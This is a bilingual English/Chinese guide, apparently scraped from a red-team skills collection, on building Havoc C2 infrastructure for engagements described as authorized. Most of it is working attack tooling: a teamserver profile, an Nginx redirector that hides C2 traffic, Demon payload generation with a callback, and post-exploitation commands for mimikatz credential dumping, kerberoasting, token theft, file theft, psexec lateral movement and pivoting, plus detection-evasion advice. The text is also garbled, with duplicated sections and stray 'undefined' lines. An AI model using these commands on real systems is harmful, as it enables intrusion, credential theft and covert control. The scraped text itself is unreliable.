Building Red Team C2 Infrastructure with Havoc

基于Havoc搭建红队C2基础设施

Overview

概述

Havoc is a modern, open-source post-exploitation command and control (C2) framework created by C5pider. It provides a collaborative multi-operator interface similar to Cobalt Strike, featuring the Demon agent for Windows post-exploitation, customizable profiles for traffic malleable configurations, and support for HTTP/HTTPS/SMB listeners. This skill covers deploying production-grade Havoc C2 infrastructure with proper OPSEC considerations for authorized red team engagements.

Havoc是由C5pider开发的现代开源后渗透测试命令与控制（C2）框架。它提供了类似Cobalt Strike的协作式多操作员界面，具备用于Windows后渗透的Demon agent、可自定义的流量变形配置文件，以及对HTTP/HTTPS/SMB监听器的支持。本技能介绍了如何部署符合OPSEC要求的生产级Havoc C2基础设施，用于授权的红队演练。

When to Use

适用场景

When deploying or configuring building red team c2 infrastructure with havoc capabilities in your environment
When establishing security controls aligned to compliance requirements
When building or improving security architecture for this domain
When conducting security assessments that require this implementation

在你的环境中部署或配置具备Havoc能力的红队C2基础设施时
建立符合合规要求的安全控制措施时
构建或改进该领域的安全架构时
开展需要此类实施的安全评估时

Prerequisites

前置条件

Ubuntu 22.04 LTS or Debian 11+ (for Teamserver)
Kali Linux 2023+ (for Client)
VPS providers: DigitalOcean, Linode, or AWS EC2 (minimum 2GB RAM, 2 vCPU)
Domain name aged 30+ days with valid SSL certificate
Written authorization for red team engagement

Ubuntu 22.04 LTS或Debian 11+（用于Teamserver）
Kali Linux 2023+（用于客户端）
VPS提供商：DigitalOcean、Linode或AWS EC2（最低2GB内存，2核CPU）
注册时长30天以上的域名，并配有有效的SSL证书
红队演练的书面授权文件

Architecture

架构

┌──────────────────────────────────────────────────────────────┐
│                    HAVOC C2 ARCHITECTURE                      │
├──────────────────────────────────────────────────────────────┤
│                                                               │
│  ┌──────────┐     ┌──────────────┐     ┌──────────────────┐ │
│  │  Havoc    │────▶│  HTTPS       │────▶│  Target Network  │ │
│  │  Client   │     │  Redirector  │     │  (Demon Agent)   │ │
│  │  (Kali)   │     │  (Nginx/CDN) │     │                  │ │
│  └──────────┘     └──────────────┘     └──────────────────┘ │
│       │                   │                                   │
│       │           ┌──────────────┐                            │
│       └──────────▶│  Havoc       │                            │
│                   │  Teamserver  │                            │
│                   │  (Ubuntu VPS)│                            │
│                   │  Port 40056  │                            │
│                   └──────────────┘                            │
│                                                               │
└──────────────────────────────────────────────────────────────┘

┌──────────────────────────────────────────────────────────────┐
│                    HAVOC C2 ARCHITECTURE                      │
├──────────────────────────────────────────────────────────────┤
│                                                               │
│  ┌──────────┐     ┌──────────────┐     ┌──────────────────┐ │
│  │  Havoc    │────▶│  HTTPS       │────▶│  Target Network  │ │
│  │  Client   │     │  Redirector  │     │  (Demon Agent)   │ │
│  │  (Kali)   │     │  (Nginx/CDN) │     │                  │ │
│  └──────────┘     └──────────────┘     └──────────────────┘ │
│       │                   │                                   │
│       │           ┌──────────────┐                            │
│       └──────────▶│  Havoc       │                            │
│                   │  Teamserver  │                            │
│                   │  (Ubuntu VPS)│                            │
│                   │  Port 40056  │                            │
│                   └──────────────┘                            │
│                                                               │
└──────────────────────────────────────────────────────────────┘

Step 1: Install Havoc Teamserver

步骤1：安装Havoc Teamserver

bash

undefined

bash

undefined

Clone the Havoc repository

git clone https://github.com/HavocFramework/Havoc.git cd Havoc

Install dependencies (Ubuntu 22.04)

sudo apt update sudo apt install -y git build-essential apt-utils cmake libfontconfig1
libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev
libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev
libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser
qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev
qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev
python3-dev libboost-all-dev mingw-w64 nasm

Build the Teamserver

cd teamserver go mod download golang.org/x/sys go mod download github.com/ugorji/go cd .. make ts-build

Build the Client

make client-build

undefined

make client-build

undefined

Step 2: Configure Teamserver Profile

步骤2：配置Teamserver配置文件

Create the Havoc profile (

havoc.yaotl

):

hcl

Teamserver {
    Host = "0.0.0.0"
    Port = 40056

    Build {
        Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "/usr/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
    user "operator1" {
        Password = "Str0ngP@ssw0rd!"
    }
    user "operator2" {
        Password = "An0th3rP@ss!"
    }
}

Listeners {
    Http {
        Name         = "HTTPS Listener"
        Hosts        = ["c2.yourdomain.com"]
        HostBind     = "0.0.0.0"
        HostRotation = "round-robin"
        PortBind     = 443
        PortConn     = 443
        Secure       = true
        UserAgent    = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

        Uris = [
            "/api/v2/auth",
            "/api/v2/status",
            "/content/images/gallery",
        ]

        Headers = [
            "X-Requested-With: XMLHttpRequest",
            "Content-Type: application/json",
        ]

        Response {
            Headers = [
                "Content-Type: application/json",
                "Server: nginx/1.24.0",
                "X-Frame-Options: DENY",
            ]
        }
    }
}

Demon {
    Sleep  = 10
    Jitter = 30

    TrustXForwardedFor = false

    Injection {
        Spawn64 = "C:\\Windows\\System32\\notepad.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
    }
}

创建Havoc配置文件（

havoc.yaotl

）：

hcl

Teamserver {
    Host = "0.0.0.0"
    Port = 40056

    Build {
        Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "/usr/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
    user "operator1" {
        Password = "Str0ngP@ssw0rd!"
    }
    user "operator2" {
        Password = "An0th3rP@ss!"
    }
}

Listeners {
    Http {
        Name         = "HTTPS Listener"
        Hosts        = ["c2.yourdomain.com"]
        HostBind     = "0.0.0.0"
        HostRotation = "round-robin"
        PortBind     = 443
        PortConn     = 443
        Secure       = true
        UserAgent    = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

        Uris = [
            "/api/v2/auth",
            "/api/v2/status",
            "/content/images/gallery",
        ]

        Headers = [
            "X-Requested-With: XMLHttpRequest",
            "Content-Type: application/json",
        ]

        Response {
            Headers = [
                "Content-Type: application/json",
                "Server: nginx/1.24.0",
                "X-Frame-Options: DENY",
            ]
        }
    }
}

Demon {
    Sleep  = 10
    Jitter = 30

    TrustXForwardedFor = false

    Injection {
        Spawn64 = "C:\\Windows\\System32\\notepad.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
    }
}

Step 3: Start Teamserver

步骤3：启动Teamserver

bash

undefined

bash

undefined

Start the Havoc Teamserver with the profile

./havoc server --profile ./profiles/havoc.yaotl -v

Expected output:

[*] Havoc Framework [Version: 0.7]

[*] Teamserver started on: 0.0.0.0:40056

[*] HTTPS Listener started on: 0.0.0.0:443

undefined

undefined

Step 4: Configure HTTPS Redirector

步骤4：配置HTTPS重定向器

Set up an Nginx reverse proxy on a separate VPS as a redirector:

nginx

undefined

在独立VPS上设置Nginx反向代理作为重定向器：

nginx

undefined

/etc/nginx/sites-available/c2-redirector

server { listen 443 ssl; server_name c2.yourdomain.com;

ssl_certificate /etc/letsencrypt/live/c2.yourdomain.com/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/c2.yourdomain.com/privkey.pem;

# Only forward traffic matching C2 URIs
location /api/v2/auth {
    proxy_pass https://TEAMSERVER_IP:443;
    proxy_ssl_verify off;
    proxy_set_header Host $host;
    proxy_set_header X-Forwarded-For $remote_addr;
}

location /api/v2/status {
    proxy_pass https://TEAMSERVER_IP:443;
    proxy_ssl_verify off;
    proxy_set_header Host $host;
}

location /content/images/gallery {
    proxy_pass https://TEAMSERVER_IP:443;
    proxy_ssl_verify off;
    proxy_set_header Host $host;
}

# Redirect all other traffic to legitimate site
location / {
    return 301 https://www.microsoft.com;
}

}

undefined

server { listen 443 ssl; server_name c2.yourdomain.com;

ssl_certificate /etc/letsencrypt/live/c2.yourdomain.com/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/c2.yourdomain.com/privkey.pem;

# Only forward traffic matching C2 URIs
location /api/v2/auth {
    proxy_pass https://TEAMSERVER_IP:443;
    proxy_ssl_verify off;
    proxy_set_header Host $host;
    proxy_set_header X-Forwarded-For $remote_addr;
}

location /api/v2/status {
    proxy_pass https://TEAMSERVER_IP:443;
    proxy_ssl_verify off;
    proxy_set_header Host $host;
}

location /content/images/gallery {
    proxy_pass https://TEAMSERVER_IP:443;
    proxy_ssl_verify off;
    proxy_set_header Host $host;
}

# Redirect all other traffic to legitimate site
location / {
    return 301 https://www.microsoft.com;
}

}

undefined

Step 5: Generate Demon Payload

步骤5：生成Demon载荷

bash

undefined

bash

undefined

Via the Havoc Client GUI:

Attack > Payload

Agent: Demon

Listener: HTTPS Listener

Arch: x64

Format: Windows Exe / Windows Shellcode

Sleep Technique: WaitForSingleObjectEx (Ekko)

Spawn: C:\Windows\System32\notepad.exe

The generated Demon payload connects back through:

Target -> Redirector (Nginx) -> Teamserver

undefined

undefined

Step 6: Post-Exploitation with Demon

步骤6：使用Demon进行后渗透测试

Once a Demon session checks in, common post-exploitation commands:

undefined

当Demon会话上线后，常用的后渗透命令：

undefined

Session interaction

demon> whoami demon> shell systeminfo demon> shell ipconfig /all

Process listing

demon> proc list

File operations

demon> download C:\Users\target\Documents\sensitive.docx demon> upload /tools/Rubeus.exe C:\Windows\Temp\r.exe

In-memory .NET execution (no disk touch)

demon> dotnet inline-execute /tools/Seatbelt.exe -group=all demon> dotnet inline-execute /tools/SharpHound.exe -c All

Token manipulation

demon> token steal <PID> demon> token make DOMAIN\user password

Credential access

demon> mimikatz sekurlsa::logonpasswords demon> dotnet inline-execute /tools/Rubeus.exe kerberoast

Lateral movement

demon> jump psexec TARGET_HOST HTTPS_LISTENER demon> jump winrm TARGET_HOST HTTPS_LISTENER

Pivoting

demon> socks start 1080 demon> rportfwd start 8080 TARGET_INTERNAL 80

undefined

demon> socks start 1080 demon> rportfwd start 8080 TARGET_INTERNAL 80

undefined

OPSEC Considerations

OPSEC注意事项

Aspect	Recommendation
Domain Age	Register domains 30+ days before engagement
SSL Certificates	Use Let's Encrypt or purchased certificates, never self-signed
Categorization	Submit domain to Bluecoat/Fortiguard for categorization
Sleep/Jitter	Minimum 10s sleep with 30%+ jitter for long-haul operations
User-Agent	Match target organization's common browser user-agent
Kill Date	Set payload expiration to engagement end date
Infrastructure	Separate teamserver, redirector, and phishing infrastructure
Payload Format	Use shellcode with custom loader instead of raw EXE

方面	建议
域名时长	提前30天以上注册域名用于演练
SSL证书	使用Let's Encrypt或付费证书，切勿使用自签名证书
域名分类	将域名提交至Bluecoat/Fortiguard进行分类
休眠/抖动	长期操作时，休眠时间至少10秒，抖动率30%以上
用户代理	匹配目标组织常用的浏览器用户代理
失效日期	将载荷过期时间设置为演练结束日期
基础设施	分离Teamserver、重定向器和钓鱼基础设施
载荷格式	使用带自定义加载器的shellcode，而非原始EXE

MITRE ATT&CK Mapping

MITRE ATT&CK映射

Technique ID	Name	Phase
T1583.001	Acquire Infrastructure: Domains	Resource Development
T1583.003	Acquire Infrastructure: Virtual Private Server	Resource Development
T1587.001	Develop Capabilities: Malware	Resource Development
T1071.001	Application Layer Protocol: Web Protocols	Command and Control
T1573.002	Encrypted Channel: Asymmetric Cryptography	Command and Control
T1090.002	Proxy: External Proxy	Command and Control
T1105	Ingress Tool Transfer	Command and Control
T1055	Process Injection	Defense Evasion

技术ID	名称	阶段
T1583.001	获取基础设施：域名	资源开发
T1583.003	获取基础设施：虚拟专用服务器	资源开发
T1587.001	开发能力：恶意软件	资源开发
T1071.001	应用层协议：Web协议	命令与控制
T1573.002	加密信道：非对称加密	命令与控制
T1090.002	代理：外部代理	命令与控制
T1105	传入工具传输	命令与控制
T1055	进程注入	防御规避

References

参考资料

Havoc Framework GitHub: https://github.com/HavocFramework/Havoc
Havoc Wiki: https://github.com/HavocFramework/Havoc/blob/main/WIKI.MD
RedTeamOps Havoc 101: https://github.com/WesleyWong420/RedTeamOps-Havoc-101
Deploying Havoc C2 via Terraform: https://www.100daysofredteam.com/p/red-team-infrastructure-deploying-havoc-c2-via-terraform

Havoc Framework GitHub：https://github.com/HavocFramework/Havoc
Havoc Wiki：https://github.com/HavocFramework/Havoc/blob/main/WIKI.MD
RedTeamOps Havoc 101：https://github.com/WesleyWong420/RedTeamOps-Havoc-101
基于Terraform部署Havoc C2：https://www.100daysofredteam.com/p/red-team-infrastructure-deploying-havoc-c2-via-terraform

building-red-team-c2-infrastructure-with-havoc

Original

Translation

Building Red Team C2 Infrastructure with Havoc

基于Havoc搭建红队C2基础设施

Overview

概述

When to Use

适用场景

Prerequisites

前置条件

Architecture

架构

Step 1: Install Havoc Teamserver

步骤1：安装Havoc Teamserver

Clone the Havoc repository

Clone the Havoc repository

Install dependencies (Ubuntu 22.04)

Install dependencies (Ubuntu 22.04)

Build the Teamserver

Build the Teamserver

Build the Client

Build the Client

Step 2: Configure Teamserver Profile

步骤2：配置Teamserver配置文件

Step 3: Start Teamserver

步骤3：启动Teamserver

Start the Havoc Teamserver with the profile

Start the Havoc Teamserver with the profile

Expected output:

Expected output:

[*] Havoc Framework [Version: 0.7]

[*] Havoc Framework [Version: 0.7]

[*] Teamserver started on: 0.0.0.0:40056

[*] Teamserver started on: 0.0.0.0:40056

[*] HTTPS Listener started on: 0.0.0.0:443

[*] HTTPS Listener started on: 0.0.0.0:443

Step 4: Configure HTTPS Redirector

步骤4：配置HTTPS重定向器

/etc/nginx/sites-available/c2-redirector

/etc/nginx/sites-available/c2-redirector

Step 5: Generate Demon Payload

步骤5：生成Demon载荷

Via the Havoc Client GUI:

Via the Havoc Client GUI:

Attack > Payload

Attack > Payload

Agent: Demon

Agent: Demon

Listener: HTTPS Listener

Listener: HTTPS Listener

Arch: x64

Arch: x64

Format: Windows Exe / Windows Shellcode

Format: Windows Exe / Windows Shellcode

Sleep Technique: WaitForSingleObjectEx (Ekko)

Sleep Technique: WaitForSingleObjectEx (Ekko)

Spawn: C:\Windows\System32\notepad.exe

Spawn: C:\Windows\System32\notepad.exe

The generated Demon payload connects back through:

The generated Demon payload connects back through:

Target -> Redirector (Nginx) -> Teamserver

Target -> Redirector (Nginx) -> Teamserver

Step 6: Post-Exploitation with Demon

步骤6：使用Demon进行后渗透测试

Session interaction

Session interaction

Process listing

Process listing

File operations

File operations

In-memory .NET execution (no disk touch)

In-memory .NET execution (no disk touch)

Token manipulation

Token manipulation

Credential access

Credential access

Lateral movement

Lateral movement

Pivoting